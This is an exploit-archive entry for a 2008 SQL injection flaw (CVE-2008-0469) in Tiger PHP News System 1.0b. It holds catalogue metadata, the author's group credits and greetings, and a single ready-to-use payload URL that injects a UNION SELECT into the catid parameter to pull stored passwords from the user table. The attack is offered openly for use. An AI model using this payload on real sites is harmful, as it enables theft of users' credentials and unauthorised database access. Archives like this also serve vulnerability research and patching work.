EXPLOITS

Tiger PHP News System 1.0b build 39 - SQL Injection

Author: 0in
type: webapps
platform: php
port: 
date_added: 2008-01-24  
date_updated:   
verified: 1  
codes: OSVDB-40539;CVE-2008-0469  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 4984.txt  

/*
 *Tiger PHP News System SQL Injection
 *Bug found bY 0in from DaRk-Coders Group!
 *Homepage: http://dark-coders.4rh.eu or http://dark-coders.prv.pl
 *IRC:#dark-coders at irc.freenode.org
 *Email: 0in(dot)email(at)gmail(dot)com
*/

 Script home: http://tpns.k-na.se/
 Exploit: http://localhost/?page=newscat&catid=-666%20union%20select%20passwd%20from%20user

 Greetings to:All Dark-Coders Team Members - Die-Angel,m4r1usz,suN8Hclf,Djlinux,
 Aristo89

# milw0rm.com [2008-01-25]